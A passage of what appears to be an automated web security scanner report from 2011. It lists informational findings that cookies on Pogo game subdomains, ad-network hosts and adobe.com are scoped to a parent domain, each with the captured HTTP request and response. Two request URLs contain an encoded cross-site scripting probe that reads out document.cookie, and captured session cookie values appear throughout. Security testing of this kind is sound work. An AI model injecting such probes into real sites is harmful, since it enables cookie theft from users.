HTTP/1.1 301 Moved Permanently Server: Apache-Coyote/1.1 Set-Cookie: lsn_statp=FAJFJR4AAA Set-Cookie: lsn_qstring=FLenzF8lvbI Set-Cookie: lsn_track=UmFuZG9tSVZz Set-Cookie: lsclick_mid13508="2011-01 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Sun, 09 Jan 2011 02:07:09 GMT Cache-Control: no-cache Pragma: no-cache Location: &partnerId=30&siteID Content-Type: text/html;charset=UTF-8 Connection: close <html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30 ...[SNIP]... |
9.25. http://clubpogo-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://clubpogo-games |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=0C60C5F9106
BE47764E124E1F5A58B30 .000385; Domain=.pogo.com; Path=/ - com.pogo.unid=660643
7090669254; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:20 GMT; Path=/
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=0C60C5F9106 Content-Language: en-US Set-Cookie: com.pogo.unid=660643 Location: http://clubpogo-games Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:07:20 GMT Server: Apache-Coyote/1.1 |
9.26. http://flash-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://flash-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=DD9ECB5481B
20153BB68707C5F4897F5 .000067; Domain=.pogo.com; Path=/ - com.pogo.unid=660652
7284785334; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=DD9ECB5481B Content-Language: en-US Set-Cookie: com.pogo.unid=660652 Location: http://flash-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:14:43 GMT Server: Apache-Coyote/1.1 |
9.27. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- ruid=154d290e46adc1d
6f373dd09^2^1294537835 ^2915161843; expires=Sat, 09-Apr-2011 01:50:35 GMT; max-age=7776000; path=/; domain=.rubiconproject .com; - rsid=FcGERCD9s4JUW
/TrcU4Dz61qa66Y1k1ir e2YJBmN8SN4G8GheDmUS J4NHOc49cA03rZJzx16p B3UdIwsGOQ/PP8TzZUxG DmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject .com; - rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject
.com - csi15=3188204.js^2
^1294536315^1294537835; expires=Sun, 16-Jan-2011 01:50:35 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:50:35 GMT Server: RAS/1.3 (Unix) P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: ruid=154d290e46adc1d Set-Cookie: rsid=FcGERCD9s4JUW Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
9.28. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject
.com - csi15=3188204.js^1
^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
9.29. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-15.js |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- ruid=154d290e46adc1d
6f373dd09^3^1294539219 ^2915161843; expires=Sat, 09-Apr-2011 02:13:39 GMT; max-age=7776000; path=/; domain=.rubiconproject .com; - rsid=FcGERCD9s4JUW
/TrcU4Dz61qa66Y1k1ir e2YJBmN8SN4G8GheDmUS J4NHOc49cA03rZJzx16p B3UdIwsGOQ/PP8TzZUxG DmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject .com; - rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject
.com - csi15=3188204.js^3
^1294536315^1294539219; expires=Sun, 16-Jan-2011 02:13:39 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6942-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://board-games.pogo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_1523=MDo0lVW4JKD |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:13:39 GMT Server: RAS/1.3 (Unix) P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: ruid=154d290e46adc1d Set-Cookie: rsid=FcGERCD9s4JUW Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^3 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
9.30. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-2.js |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject
.com - csi2=3146355.js^1
^1294536507^1294536507; expires=Sun, 16-Jan-2011 01:28:27 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6942-2.js?cb Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:28:27 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3146355.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2368 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3146355" ...[SNIP]... |
9.31. http://puzzle-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=1A57DDA503E
2C81056979F24457357BF .000128; Domain=.pogo.com; Path=/ - com.pogo.unid=660623
0932049839; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:46 GMT; Path=/
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=1A57DDA503E Content-Language: en-US Set-Cookie: com.pogo.unid=660623 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:46 GMT Server: Apache-Coyote/1.1 |
9.32. http://puzzle-games.pogo.com/games/bejeweled2 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/bejeweled2 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=EADAF0FD321
8310E1CEEBA781854D80D .000146; Domain=.pogo.com; Path=/ - com.pogo.unid=660657
0234467613; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:50 GMT; Path=/
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=EADAF0FD321 Content-Language: en-US Set-Cookie: com.pogo.unid=660657 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:49 GMT Server: Apache-Coyote/1.1 |
9.33. http://puzzle-games.pogo.com/games/yahtzee-party previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/yahtzee-party |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=E4AF788ED2A
A6227ABE9A8C3F56D31D0 .000290; Domain=.pogo.com; Path=/ - com.pogo.unid=660651
8694853812; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:49 GMT; Path=/
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=E4AF788ED2A Content-Language: en-US Set-Cookie: com.pogo.unid=660651 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:49 GMT Server: Apache-Coyote/1.1 |
9.34. http://r.turn.com/server/pixel.htm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
9.35. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /click/site=0000758630 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- C2=3yRKNJpwIg02FlBCd
bdRZA7gHw8jGHgsjhADg aUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ - 52607936=_4d290f90
,0846642328,758630^906164 ^1^0,0_; domain=advertising.com; path=/click - 0846642328=_4d290f90
,0846642328,758630^906164 ^1^0,1_; domain=advertising.com; path=/click
Request
GET /click/site=0000758630 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90 |
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCd Set-Cookie: 52607936=_4d290f90 Set-Cookie: 0846642328=_4d290f90 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f%3bord </body></html> |
9.36. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=755399/size=300250 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- F1=BUBFp0kAAAAAHb4CA
EAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - BASE=YnQIx9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqQBlyv1AitvC52k1WF! ; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - ROLL=v5Q2Q0cRVUyqcZa
/vGc3WhvkMxIiWOS7HgfCaOA! ; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - 72318651=_4d291415
,1206372681,755399^944664 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=755399/size=300250 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.944664.755399 Set-Cookie: F1=BUBFp0kAAAAAHb4CA Set-Cookie: BASE=YnQIx9MmSf Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa Set-Cookie: 72318651=_4d291415 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047 document.write('<iframe src="http://view.atdmt ...[SNIP]... |
9.37. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=758630/size=160600 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- C2=Q+QKNJpwIg02FwBCd
bdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - F1=BA5Dp0EBAAAABAAAA
EAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - BASE=YnQIy9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
- 52607936=_4d290f90
,0846642328,758630^906164 ^1^0,0_; domain=advertising.com; path=/click
Request
GET /site=758630/size=160600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.906164.758630 Set-Cookie: C2=Q+QKNJpwIg02FwBCd Set-Cookie: F1=BA5Dp0EBAAAABAAAA Set-Cookie: BASE=YnQIy9MmSf Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595 document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
9.38. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=777340/size=300600 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- C2=wPRKNJpwIg02FtBCd
bdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - F1=BA/Ep0EBAAAABAAAA
IAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - BASE=YnQIz9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - ROLL=v5Q2W0cRVUyqcZa
/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - 17871065=_4d2913f0
,4120808867,777340^955433 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=777340/size=300600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.955433.777340 Set-Cookie: C2=wPRKNJpwIg02FtBCd Set-Cookie: F1=BA/Ep0EBAAAABAAAA Set-Cookie: BASE=YnQIz9MmSf Set-Cookie: ROLL=v5Q2W0cRVUyqcZa Set-Cookie: 17871065=_4d2913f0 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579 document.write('<HTML>') ...[SNIP]... |
9.39. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=777340/size=300600 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- C2=UQRKNJpwIg02FAHCd
bdBwB7gHw8jGPgsjhADg a0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - F1=BQBFp0EBAAAABAAAA
MAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - BASE=YnQIw9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - ROLL=v5Q2X0cRVUyqcZa
/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - 49979532=_4d291414
,0737842127,777340^949895 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=777340/size=300600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.949895.777340 Set-Cookie: C2=UQRKNJpwIg02FAHCd Set-Cookie: F1=BQBFp0EBAAAABAAAA Set-Cookie: BASE=YnQIw9MmSf Set-Cookie: ROLL=v5Q2X0cRVUyqcZa Set-Cookie: 49979532=_4d291414 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047 document.write('<iframe src="http://view.atdmt ...[SNIP]... |
9.40. http://www.adobe.com/cfusion/exchange/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /cfusion/exchange/ |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1C5C2077%2D9490
%2D3BC1%2D91B37A414A 682C30;domain=.adobe.com ;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/cfusion/
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
